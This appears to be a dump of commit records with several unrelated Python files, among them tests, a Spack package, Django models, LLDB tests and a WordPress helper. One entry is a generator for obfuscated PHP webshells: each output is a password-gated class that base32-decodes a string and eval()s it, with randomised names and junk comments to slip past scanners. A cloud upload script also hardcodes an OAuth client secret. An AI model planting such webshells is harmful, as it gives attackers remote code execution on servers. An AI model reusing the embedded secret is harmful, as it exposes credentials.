super(TestSignalCompare, self).__init__(*args, **kwargs)
def test_conditional_compare(self):
"""Test conditional_compare"""
A = [0, 0, 0, 3, 3, 0, 0, 0]
B = [0, 0, 2, 2, 2, 2, 1, 1]
run = trappy.Run(".", events=["event"])
df = pd.DataFrame({"A": A, "B": B})
run.event.data_frame = df
s = SignalCompare(run, "event:A", "event:B")
expected = (1.5, 2.0 / 7)
self.assertEqual(
s.conditional_compare(
"event:A > event:B",
method="rect"),
expected)
|
apache-2.0
|
Python
|
|
f91d32d25bc84a795d53f2f7698b77862d08f690
|
Add a test_traits file
|
frostidaho/dynmen
|
tests/test_traits.py
|
tests/test_traits.py
|
# -*- coding: utf-8 -*-
from dynmen import common
import unittest
class TestFlag(unittest.TestCase):
@classmethod
def setUpClass(cls):
class TFlag(object):
dflt_t = common.Flag('dflt_t', default=True, flag='-dt')
dflt_f = common.Flag('dflt_f', default=False, flag='-df')
cls.TFlag = TFlag
def setUp(self):
self.tflag = self.TFlag()
def test_dflt_true(self):
self.assertEqual(self.tflag.dflt_t, '-dt')
self.tflag.dflt_t = False
self.assertFalse('')
def test_dflt_false(self):
self.assertEqual(self.tflag.dflt_f, '')
self.tflag.dflt_f = True
self.assertEqual(self.tflag.dflt_f, '-df')
def test_validation(self):
with self.assertRaises(TypeError):
self.tflag.dflt_f = 37
with self.assertRaises(TypeError):
self.tflag.dflt_t = 'asdfasdf'
|
mit
|
Python
|
|
8e7784759515a2ffa88c43b85695087fff6d9c8c
|
add create_webshell_with_py.py @pureqh :💯
|
hillwah/webshell,hillwah/webshell,360sec/webshell,tennc/webshell,tennc/webshell,hillwah/webshell,tennc/webshell,360sec/webshell,tennc/webshell,tennc/webshell,360sec/webshell,360sec/webshell,tennc/webshell,hillwah/webshell,360sec/webshell,hillwah/webshell,hillwah/webshell,360sec/webshell,360sec/webshell,hillwah/webshell,tennc/webshell,hillwah/webshell,360sec/webshell,hillwah/webshell,tennc/webshell,360sec/webshell,hillwah/webshell,tennc/webshell,tennc/webshell,360sec/webshell
|
php/create_webshell_with_py.py
|
php/create_webshell_with_py.py
|
import random
#author: pureqh
#github: https://github.com/pureqh/webshell
#use:GET:http://url?pass=pureqh POST:zero
shell = '''<?php
class {0}{1}
public ${2} = null;
public ${3} = null;
function __construct(){1}
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->{3} = @{9}($this->{2});
@eval({5}.$this->{3}.{5});
{4}{4}{4}
new {0}();
function {6}(${7}){1}
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 8;
$v += ord(${7}[$i]);
$vbits += 8;
while ($vbits >= 5) {1}
$vbits -= 5;
${8} .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);{4}{4}
if ($vbits > 0){1}
$v <<= (5 - $vbits);
${8} .= $BASE32_ALPHABET[$v];{4}
return ${8};{4}
function {9}(${7}){1}
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 5;
if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
$v += (ord(${7}[$i]) - 97);
{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
$v += (24 + ${7}[$i]);
{4} else {1}
exit(1);
{4}
$vbits += 5;
while ($vbits >= 8){1}
$vbits -= 8;
${8} .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);{4}{4}
return ${8};{4}
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
lef = '''{'''
parameter1 = random_name(4)
parameter2 = random_name(4)
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
fun1 = random_name(4)
fun1_vul = random_name(4)
fun1_ret = random_name(4)
fun2 = random_name(4)
shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
return shellc
if __name__ == '__main__':
print (build_webshell())
|
mit
|
Python
|
|
34b7d99becd1664c1a5881da178fb4ae8b871bee
|
Add new package: mahout (#18048)
|
LLNL/spack,iulian787/spack,LLNL/spack,iulian787/spack,LLNL/spack,iulian787/spack,LLNL/spack,LLNL/spack,iulian787/spack,iulian787/spack
|
var/spack/repos/builtin/packages/mahout/package.py
|
var/spack/repos/builtin/packages/mahout/package.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Mahout(Package):
"""The Apache Mahout project's goal is to build an environment for
quickly creating scalable performant machine learning applications."""
homepage = "https://mahout.apache.org/"
url = "https://archive.apache.org/dist/mahout/0.13.0/apache-mahout-distribution-0.13.0-src.tar.gz"
list_url = "https://archive.apache.org/dist/mahout"
list_depth = 1
version('0.13.0', sha256='bbe5a584fa83eb4ea3e0c146256e3e913c225426434759458d1423508da7c519')
version('0.12.2', sha256='cac9a3fd4f11b2cb850b86d1bd23aec90e960cfae91850c49056c2eaae71afba')
version('0.12.1', sha256='32e334115e4b2bfa21ba58e888fc47cdde2ca32c915d1694ed6761bda3b05dbb')
version('0.12.0', sha256='65f340072131b1178b7bf4da115782254bdb20d6abd9789f10fc6dfe1ea7e7ad')
depends_on('maven', type='build')
depends_on('java@8', type=('build', 'run'))
def install(self, spec, prefix):
mvn = which('mvn')
mvn('package', '-DskipTests')
install_tree('.', prefix)
|
lgpl-2.1
|
Python
|
|
3867db9e3c2107deae0c2b3e7f8ba3461bb550b2
|
Add test case to check invalid time_start (#558)
|
interuss/dss,interuss/dss,interuss/dss,interuss/dss
|
monitoring/prober/scd/test_subscription_query_time.py
|
monitoring/prober/scd/test_subscription_query_time.py
|
"""Strategic conflict detection Subscription put query tests:
- query with different time formats.
"""
import datetime
from monitoring.monitorlib.infrastructure import default_scope
from monitoring.monitorlib import scd
from monitoring.monitorlib.scd import SCOPE_SC
from monitoring.prober.infrastructure import for_api_versions
BASE_URL = 'https://example.com/uss'
SUB_ID = '00000088-b268-481c-a32d-6be442000000'
def _make_sub_req(time_start, time_end, alt_start, alt_end, radius, scd_api):
req = {
"extents": scd.make_vol4(time_start, time_end, alt_start, alt_end, scd.make_circle(-56, 178, radius)),
"old_version": 0,
"uss_base_url": BASE_URL,
"notify_for_constraints": False
}
if scd_api == scd.API_0_3_5:
req["notify_for_operations"] = True
elif scd_api == scd.API_0_3_15:
req["notify_for_operational_intents"] = True
return req
@for_api_versions(scd.API_0_3_5, scd.API_0_3_15)
@default_scope(SCOPE_SC)
def test_subscription_with_invalid_start_time(scd_api, scd_session):
if scd_session is None:
return
time_start = datetime.datetime.utcnow()
time_end = time_start + datetime.timedelta(hours=2.5)
req = _make_sub_req(time_start, time_end, 200, 1000, 500, scd_api)
req['extents']['time_start']['value'] = 'something-invalid'
resp = scd_session.put('/subscriptions/{}'.format(SUB_ID), json=req)
assert resp.status_code == 400, resp.content
|
apache-2.0
|
Python
|
|
32fb5d7d98c112bf9a358339931f2708114fd56b
|
fix commentary of DimensionKey in questions.models in API for sphinx
|
hds-lab/textvisdrg,hds-lab/textvisdrg,hds-lab/textvisdrg,hds-lab/textvisdrg,hds-lab/textvisdrg
|
msgvis/apps/questions/models.py
|
msgvis/apps/questions/models.py
|
from django.db import models
from msgvis.apps.dimensions import registry
from django.db.models import Q
class Article(models.Model):
"""
A published research article.
"""
year = models.PositiveIntegerField(null=True, default=None, blank=True)
"""The publication year for the article."""
authors = models.CharField(max_length=250, default=None, blank=True)
"""A plain-text author list."""
link = models.CharField(max_length=250, default=None, blank=True)
"""A url to the article."""
title = models.CharField(max_length=250, default=None, blank=True)
"""The title of the article."""
venue = models.CharField(max_length=250, default=None, blank=True)
"""The venue where the article was published."""
class Question(models.Model):
"""
A research question from an :class:`Article`.
May be associated with a number of :class:`.DimensionKey` objects.
"""
source = models.ForeignKey(Article, null=True, default=None)
"""The source article for the question."""
text = models.TextField()
"""The text of the question."""
dimensions = models.ManyToManyField("dimensions.DimensionKey")
"""A set of dimensions related to the question."""
@staticmethod
def get_dimension_key_model(key):
return registry.get_dimension(key).get_key_model()
def add_dimension(self, key):
self.dimensions.add(self.get_dimension_key_model(key))
def get_sample_questions(dimension_list):
"""
Given dimensions, return sample research questions.
"""
questions = Question.objects.all()
for dimension in dimension_list:
questions = questions.filter(dimensions__key=dimension)
if questions.count() == 0:
questions = Question.objects.all()
"""Consider the case that no dimension in the existing questions matches"""
#TODO: may need a better way to handle this
return questions[:10]
|
from django.db import models
from msgvis.apps.dimensions import registry
from django.db.models import Q
class Article(models.Model):
"""
A published research article.
"""
year = models.PositiveIntegerField(null=True, default=None, blank=True)
"""The publication year for the article."""
authors = models.CharField(max_length=250, default=None, blank=True)
"""A plain-text author list."""
link = models.CharField(max_length=250, default=None, blank=True)
"""A url to the article."""
title = models.CharField(max_length=250, default=None, blank=True)
"""The title of the article."""
venue = models.CharField(max_length=250, default=None, blank=True)
"""The venue where the article was published."""
class Question(models.Model):
"""
A research question from an :class:`Article`.
May be associated with a number of :class:`.Dimension` objects.
"""
source = models.ForeignKey(Article, null=True, default=None)
"""The source article for the question."""
text = models.TextField()
"""The text of the question."""
dimensions = models.ManyToManyField("dimensions.DimensionKey")
"""A set of dimensions related to the question."""
@staticmethod
def get_dimension_key_model(key):
return registry.get_dimension(key).get_key_model()
def add_dimension(self, key):
self.dimensions.add(self.get_dimension_key_model(key))
def get_sample_questions(dimension_list):
"""
Given dimensions, return sample research questions.
"""
questions = Question.objects.all()
for dimension in dimension_list:
questions = questions.filter(dimensions__key=dimension)
if questions.count() == 0:
questions = Question.objects.all()
"""Consider the case that no dimension in the existing questions matches"""
#TODO: may need a better way to handle this
return questions[:10]
|
mit
|
Python
|
ce3a61f640d37bfdb10a0862f9478153436de327
|
add script to generate a manifest file and upload dcc archives to GCS
|
isb-cgc/ISB-CGC-data-proc,isb-cgc/ISB-CGC-data-proc,isb-cgc/ISB-CGC-data-proc
|
data_upload/main/ISBCGCCreateSnapshotArchive.py
|
data_upload/main/ISBCGCCreateSnapshotArchive.py
|
'''
Created on Jun 29, 2016
Copyright 2016, Institute for Systems Biology.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
@author: michael
'''
from datetime import date
import json
import logging
import os
import sys
import gcs_wrapper
from util import create_log
from oauth2client.client import OAuth2WebServerFlow
from oauth2client import tools
from oauth2client.file import Storage
def get_credentials():
EMAIL_SCOPE = 'https://www.googleapis.com/auth/userinfo.email'
CLIENT_ID = "907668440978-0ol0griu70qkeb6k3gnn2vipfa5mgl60.apps.googleusercontent.com",
CLIENT_SECRET = "To_WJH7-1V-TofhNGcEqmEYi",
STORAGE_FILE = ".isb_credentials_dev"
oauth_flow_args = ['--noauth_local_webserver']
# where a default token file (based on the google project) will be stored for use by the endpoints
DEFAULT_STORAGE_FILE = os.path.join(os.path.expanduser("~"), STORAGE_FILE)
storage = Storage(DEFAULT_STORAGE_FILE)
credentials = storage.get()
if not credentials or credentials.invalid:
# this will bring up a verification URL to paste in a browser
flow = OAuth2WebServerFlow(CLIENT_ID, CLIENT_SECRET, EMAIL_SCOPE)
flow.auth_uri = flow.auth_uri.rstrip('/') + '?approval_prompt=force'
credentials = tools.run_flow(flow, storage, tools.argparser.parse_args(oauth_flow_args))
return credentials
def main(configfilename):
try:
os.environ['BOTO_CONFIG'] = 'C:\\Users\\michael'
get_credentials()
with open(configfilename) as configFile:
config = json.load(configFile)
log_dir = str(date.today()).replace('-', '_') + '_' + config['log_dir_tag'] + '/'
log_name = create_log(log_dir, 'create_snapshot')
log = logging.getLogger(log_name)
log.info('begin create snapshot')
gcs_wrapper.open_connection()
latestarchive07jun16path = '/titan/cancerregulome11/TCGA/repositories/dcc-mirror/datareports/resources/latestarchive_07jun16'
latestarchivepath = 'latestarchive'
snapshotprefix = '/titan/cancerregulome11/TCGA/repositories/dcc-mirror/public'
dccprefixlen = len('https://tcga-data.nci.nih.gov/tcgafiles/ftp_auth/distro_ftpusers/anonymous')
googlebucket = 'dcc_repository'
googlefolderprefix = '2016_06_07/public'
googlelinkprefix = 'https://console.cloud.google.com/m/cloudstorage/b/dcc_repository/o/2016_06_07/public'
count = 0
with open(latestarchive07jun16path) as latestarchive07jun16, open(latestarchivepath, 'w') as latestarchive:
# copy the header
latestarchive.write(latestarchive07jun16.readline())
for line in latestarchive07jun16.readline():
fields = line.strip().split('\t')
# translate the location in the dcc to the location in our mirror
pathsuffix = fields[2][dccprefixlen:]
fields[2] = googlelinkprefix + pathsuffix
latestarchive.write('\t'.join(fields) + '\n')
snapshotloc = snapshotprefix + pathsuffix
uploadpath = 'gs://' + googlebucket + '/' + googlefolderprefix + pathsuffix
if 0 == count % 100:
log.info('\t==================================\n\tgoogle path: %s\n\tgoogle link: %s\n\tsnapshot location: %s\n' % (uploadpath, fields[2], snapshotloc))
count += 1
log.info('finished create snapshot')
finally:
gcs_wrapper.close_connection()
if __name__ == '__main__':
main(sys.argv[1])
|
apache-2.0
|
Python
|
|
f1b8216408f26094a70789297198d2a63b0db0dd
|
Add pframe test.
|
mrhappyasthma/happydebugging,mrhappyasthma/HappyDebugging
|
tests/pframe_test.py
|
tests/pframe_test.py
|
"""Tests for scripts/pframe.py."""
import re
import unittest
from test_utils import import_utils
import_utils.prepare_lldb_import_or_exit()
import lldb
import_utils.prepare_for_scripts_imports()
from scripts import pframe
class PFrameTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(PFrameTest, self).__init__(*args, **kwargs)
self.debugger = None
self.target = None
def tearDown(self):
if self.debugger and self.target:
self.debugger.DeleteTarget(self.target)
def testPFrame(self):
"""Tests the expected output of the |pframe <instance>| command."""
self.debugger = lldb.SBDebugger.Create()
self.debugger.SetAsync(False)
self.target = self.debugger.CreateTarget('')
error = lldb.SBError()
process = self.target.AttachToProcessWithName(self.debugger.GetListener(),
'TestApp', False, error)
if not process:
self.assertTrue(False, 'Could not attach to process "TestApp"')
self.debugger.SetSelectedTarget(self.target)
result = lldb.SBCommandReturnObject()
# Get the test view, which has an abitrary tag of 19.
self.debugger.GetCommandInterpreter().HandleCommand(
'po [[UIWindow keyWindow] viewWithTag:19]', result)
self.assertTrue(result.Succeeded())
output = result.GetOutput()
start_index = output.find('0x')
self.assertTrue(start_index != -1)
end_index = output.find(';')
self.assertTrue(end_index != -1)
view = output[start_index:end_index]
pframe.pframe(self.debugger, view, result, None)
self.assertTrue(result.Succeeded())
expected_output_regex = r'\(origin = \(x = 0, y = 0\), size = \(width = 100, height = 100\)\)'
self.assertTrue(re.search(expected_output_regex, result.GetOutput(), re.M))
|
mit
|
Python
|
|
9524f44838df21f386b56d047e4a45e2aba9ad4e
|
Create Valid_Palindrome.py
|
UmassJin/Leetcode
|
Array/Valid_Palindrome.py
|
Array/Valid_Palindrome.py
|
Given a string, determine if it is a palindrome, considering only alphanumeric characters and ignoring cases.
For example,
"A man, a plan, a canal: Panama" is a palindrome.
"race a car" is not a palindrome.
Note:
Have you consider that the string might be empty? This is a good question to ask during an interview.
For the purpose of this problem, we define empty string as valid palindrome.
# 1. isalnum()
# 2. lower()
# 3. no need to check len at the begining
class Solution:
# @param s, a string
# @return a boolean
def isPalindrome_1(self, s):
if len(s) == 0:
return True
characters = 'abcdefghijklmnopqrstuvwxyz1234567890'
left = 0; right = len(s)-1
s = s.lower()
#while left < len(s)-1 and right >-1 and left <= right:
while left < right:
if s[left] not in characters:
left += 1
elif s[right] not in characters:
right -=1
elif s[left] == s[right]:
left += 1
right -= 1
elif s[left] != s[right]:
return False
return True
def isPalindrome(self, s):
start = 0
end = len(s) - 1
while start < end:
while start < end and not s[start].isalnum():
start += 1
while start < end and not s[end].isalnum():
end -= 1
if s[start].lower() != s[end].lower():
return False
start += 1
end -= 1
return True
|
mit
|
Python
|
|
bffa61da4576c088c081daea3833142af58fef1d
|
Add in some tests for cities
|
jhesketh/pyconau-gating-demo
|
tests/test_cities.py
|
tests/test_cities.py
|
import testtools
import cities
class TestCities(testtools.TestCase):
def test_largest(self):
largest = 'Sydney'
self.assertEqual(largest, cities.largest(cities.get_cities()).name)
|
apache-2.0
|
Python
|
|
91d24f62505462e5009cd5e0fb1176824d7c57d9
|
Test config
|
goldsborough/changes
|
tests/test_config.py
|
tests/test_config.py
|
from changes import config
from . import BaseTestCase
class ConfigTestCase(BaseTestCase):
arguments = {
'--debug': True,
'--dry-run': False,
'--help': False,
'--major': False,
'--minor': False,
'--new-version': '0.0.1',
'new_version': '0.0.1',
'--noinput': True,
'--patch': True,
'--pypi': None,
'--skip-changelog': False,
'--test-command': None,
'--tox': False,
'--version-prefix': None,
'<app_name>': 'changes',
'bump_version': False,
'changelog': True,
'install': False,
'pypi': False,
'release': False,
'tag': False,
'test': False,
'upload': False
}
def setUp(self):
config.arguments = self.arguments
def test_common_arguments(self):
expected_arguments = (
'changes',
False,
'0.0.1',
)
self.assertEquals(
expected_arguments,
config.common_arguments()
)
|
mit
|
Python
|
|
71fda989816e1848c99b801c133171216abe0df5
|
Add test for setting scheduler parameters
|
libvirt/libvirt-python,libvirt/libvirt-python,libvirt/libvirt-python
|
tests/test_domain.py
|
tests/test_domain.py
|
import unittest
import libvirt
class TestLibvirtDomain(unittest.TestCase):
def setUp(self):
self.conn = libvirt.open("test:///default")
self.dom = self.conn.lookupByName("test")
def tearDown(self):
self.dom = None
self.conn = None
def testDomainSchedParams(self):
params = self.dom.schedulerParameters()
self.assertEquals(len(params), 1)
self.assertTrue("weight" in params)
params["weight"] = 100
self.dom.setSchedulerParameters(params)
|
lgpl-2.1
|
Python
|
|
726ae01462c8945df1b7d3f32d56fc54ed9b6fa2
|
Write hub initialization tests
|
dashdotrobot/bike-wheel-calc
|
tests/test_bicycle_wheel.py
|
tests/test_bicycle_wheel.py
|
import pytest
from bikewheelcalc import BicycleWheel, Rim, Hub
# -------------------------------------------------------------------------------
# Test fixtures
#------------------------------------------------------------------------------
@pytest.fixture
def std_radial():
'Return a Standard Bicycle Wheel with radial spokes'
w = BicycleWheel()
w.hub = Hub(diam1=0.050, width1=0.025)
w.rim = Rim(radius=0.3, area=100e-6,
I11=25., I22=200., I33=100., Iw=0.0,
young_mod=69e9, shear_mod=26e9)
w.lace_radial(n_spokes=36, diameter=1.8e-3, young_mod=210e9, offset=0.)
@pytest.fixture
def std_3cross():
'Return a Standard Bicycle Wheel with 3-cross spokes'
w = BicycleWheel()
w.hub = Hub(diam1=0.050, width1=0.025)
w.rim = Rim(radius=0.3, area=100e-6,
I11=25., I22=200., I33=100., Iw=0.0,
young_mod=69e9, shear_mod=26e9)
w.lace_cross(n_spokes=36, n_cross=3, diameter=1.8e-3, young_mod=210e9, offset=0.)
# -----------------------------------------------------------------------------
# Hub tests
# -----------------------------------------------------------------------------
def test_hub_symm():
'Initialize a symmetric hub using flange diameter and width'
h = Hub(diameter=0.05, width=0.05)
assert h.width_left == 0.025
assert h.width_right == 0.025
assert h.diameter_left == 0.05
assert h.diameter_right == 0.05
def test_hub_asymm():
'Initialize an asymmetric hub using two explicit diameters and widths'
h = Hub(diameter_left=0.04, diameter_right=0.06, width_left=0.03, width_right=0.02)
assert h.width_left == 0.03
assert h.width_right == 0.02
assert h.diameter_left == 0.04
assert h.diameter_right == 0.06
def test_hub_asymm_offset():
'Initialize an asymmetric hub using a width and an offset'
h = Hub(diameter=0.05, width=0.05, offset=0.01)
assert h.width_left == 0.035
assert h.widtH_right == 0.015
|
mit
|
Python
|
|
d05a2a7504bf8e6adf6d5d94d0b810060f66a9ec
|
Create test_it_all.py
|
destruc7i0n/PyPixel
|
tests/test_it_all.py
|
tests/test_it_all.py
|
#soon TM
|
mit
|
Python
|
|
afe2cac782f2578e610137891566d862f62375c6
|
Create uds18.py
|
gbrammer/unicorn,gbrammer/unicorn,gbrammer/pygrism,gbrammer/pygrism
|
uds18.py
|
uds18.py
|
"""
Custom fits for the lens in UDS-18
"""
import unicorn
import pyfits
import emcee
|
mit
|
Python
|
|
df26dc408dc629e4802716ace5d0b3879c2b110b
|
Create factories.py
|
RonsenbergVI/trendpy,RonsenbergVI/trendpy
|
trendpy/factories.py
|
trendpy/factories.py
|
# factory.py
# MIT License
# Copyright (c) 2017 Rene Jean Corneille
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from trendpy.strategies import *
class StrategyFactory:
factories = {}
@staticmethod
def add(id,factory):
StrategyFactory.factories.put[id] = factory
@staticmethod
def create(id,*args,**kwargs):
if not id in StrategyFactory.factories:
StrategyFactory.factories[id] = eval('%s.Factory()' % id)
return StrategyFactory.factories[id].create(*args,**kwargs)
|
mit
|
Python
|
|
df7cf8ef2bdba9f50e21f4a7fc96904122fde311
|
Add gunicorn config file
|
mehdisadeghi/sqmpy,simphony/sqmpy,mehdisadeghi/sqmpy,mehdisadeghi/sqmpy,simphony/sqmpy,simphony/sqmpy
|
gunicorn_cfg.py
|
gunicorn_cfg.py
|
"""
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:3000'
# The only tested worker class is gevent
worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application loglevel
loglevel = 'debug'
|
bsd-3-clause
|
Python
|
|
cb875f2043a1c3a9ec5201336d1b577655612279
|
move utility methods into their own module as functions, clean up type lookup
|
darthlukan/bottly,shaggytwodope/bottly
|
utils.py
|
utils.py
|
def bytes_to_unicode(data):
return data.decode("UTF-8")
def unicode_to_bytes(data):
return data.encode("UTF-8")
def pretty_print(self, user, msg_type, destination, message):
if isinstance(message, list):
message = " ".join(message)
print("%s %s %s :%s" % (user, msg_type, destination, message))
|
mit
|
Python
|
|
568fe1ff8c4ef27f93751f53a27707f045f19037
|
update core api module
|
simphony/simphony-paraview,simphony/simphony-paraview
|
simphony_paraview/core/api.py
|
simphony_paraview/core/api.py
|
from .iterators import iter_cells, iter_grid_cells
from .cuba_data_accumulator import CUBADataAccumulator
from .cuba_utils import (
supported_cuba, cuba_value_types, default_cuba_value, VALUETYPES)
from .constants import points2edge, points2face, points2cell, dataset2writer
from .paraview_utils import (
write_to_file, loaded_in_paraview, typical_distance, set_data)
from .cuds2vtk import cuds2vtk
__all__ = [
'iter_cells',
'iter_grid_cells',
'CUBADataAccumulator',
'supported_cuba',
'default_cuba_value',
'cuba_value_types',
'VALUETYPES',
'points2edge',
'points2face',
'points2cell',
'dataset2writer',
'write_to_file',
'loaded_in_paraview',
'cuds2vtk',
'typical_distance',
'set_data']
|
from .iterators import iter_cells, iter_grid_cells
from .cuba_data_accumulator import CUBADataAccumulator
from .cuba_utils import (
supported_cuba, cuba_value_types, default_cuba_value, VALUETYPES)
from .constants import points2edge, points2face, points2cell, dataset2writer
from .paraview_utils import write_to_file, loaded_in_paraview
from .cuds2vtk import cuds2vtk
__all__ = [
'iter_cells',
'iter_grid_cells',
'CUBADataAccumulator',
'supported_cuba',
'default_cuba_value',
'cuba_value_types',
'VALUETYPES',
'points2edge',
'points2face',
'points2cell',
'dataset2writer',
'write_to_file',
'loaded_in_paraview',
'cuds2vtk']
|
bsd-2-clause
|
Python
|
f418e9e68d1f2a7f6a0ad5060a1ed5a7ed74664f
|
Add YCM configuration
|
aostrowski/dotfiles
|
_vim/ycm_global_extra_conf.py
|
_vim/ycm_global_extra_conf.py
|
# Copied from https://gist.github.com/micbou/f8ed3f8bd6bd24e9f89bef286437306b. Kudos to micbou
import os
import ycm_core
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( database, filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def PathsToAllParentFolders( path ):
folder = os.path.normpath( path )
if os.path.isdir( folder ):
yield folder
while True:
parent = os.path.dirname( folder )
if parent == folder:
break
folder = parent
yield folder
def FindCompilationDatabase( filename, compilation_database_folder):
if os.path.exists(os.path.abspath( compilation_database_folder )):
return compilation_database_folder
for folder in PathsToAllParentFolders( filename ):
compile_commands = os.path.join( folder, compilation_database_folder,
'compile_commands.json' )
if os.path.exists( compile_commands ):
return os.path.dirname( compile_commands )
return None
def FlagsForFile( filename, **kwargs ):
compilation_database_folder = kwargs[ 'client_data' ].get(
'g:ycm_compilation_database_folder' )
if not compilation_database_folder:
return {}
compilation_database_folder = FindCompilationDatabase(
filename, compilation_database_folder )
if not compilation_database_folder:
return {}
database = ycm_core.CompilationDatabase( compilation_database_folder )
if not database.DatabaseSuccessfullyLoaded():
return {}
compilation_info = GetCompilationInfoForFile( database, filename )
if not compilation_info:
return {}
return {
'flags': compilation_info.compiler_flags_,
'include_paths_relative_to_dir': compilation_info.compiler_working_dir_
}
|
mit
|
Python
|
|
be4374fd50d0c1148e3a734cc53391e15d4bbdc4
|
Create wksp5.py
|
indigohedgehog/RxWorkshopPy
|
wksp5.py
|
wksp5.py
|
"""Rx Workshop: Event Processing.
Part 2 - Grouping.
Usage:
python wksp5.py
"""
from __future__ import print_function
import rx
class Program:
@staticmethod
def main():
src = rx.Observable.from_iterable(get_input(),
rx.concurrency.Scheduler.new_thread)
res = src.group_by(lambda s: len(s)).to_blocking()
res.for_each(lambda g: print("New group with length = " + str(g.key))
and g.subscribe(lambda x: print
(" " + str(x) + " member of " + g.key)))
def get_input():
while True:
yield raw_input()
if __name__ == '__main__':
Program.main()
|
mit
|
Python
|
|
e789579c77d2d96d098f4b46f1dfec4d54c843e5
|
move AbstractProductCategory and AbstractNestedProductCategory
|
byteweaver/django-eca-catalogue
|
eca_catalogue/categorization/abstract_models.py
|
eca_catalogue/categorization/abstract_models.py
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from treebeard.mp_tree import MP_Node
class AbstractProductCategory(models.Model):
name = models.CharField(_("Name"), max_length=128, unique=True)
description = models.TextField(_("Description"), blank=True, null=True)
class Meta:
abstract = True
verbose_name = _("Product category")
verbose_name_plural = _("Product categories")
ordering = ['name']
def __unicode__(self):
return self.name
class AbstractNestedProductCategory(AbstractProductCategory, MP_Node):
class Meta:
abstract = True
def __unicode__(self):
if not self.is_root():
return unicode(self.get_parent()) + " -> " + self.name
return self.name
|
bsd-3-clause
|
Python
|
|
000239e4f838f6514f6e902510d70fdc41b196d5
|
Add wordpress_post
|
JulienLeonard/socialpost
|
wordpress_post.py
|
wordpress_post.py
|
import os
import time
from base64 import b64encode
import json
import requests
from wordpresspushmedia import *
#
# publish the image as a media in wordpress, and return the HTML to include into the post
#
def wordpress_publish_image(blogid,title,imageurl,bearer_key):
url = "https://public-api.wordpress.com/rest/v1/sites/" + blogid + "/media/new"
headers = {"Authorization": "bearer " + bearer_key }
postdata = { 'media_urls' : [imageurl] }
response = requests.post(url, data=json.dumps(postdata), headers=headers)
jresponse = response.json()
media = jresponse['media'][0];
general_link = media['link'];
linkdir = "/".join(general_link.split("/")[:-1])
metadata = media['metadata'];
if 'large' in metadata['sizes']:
filebig = metadata['sizes']['large']['file'];
src = linkdir + "/" + filebig;
width = metadata['sizes']['large']['width'];
height = metadata['sizes']['large']['height'];
sizetype = "size-large";
else:
src = media['link'];
width = metadata['width'];
height = metadata['height'];
sizetype = "size-full";
WPID = media['id']
SRC = src;
TITLE = title;
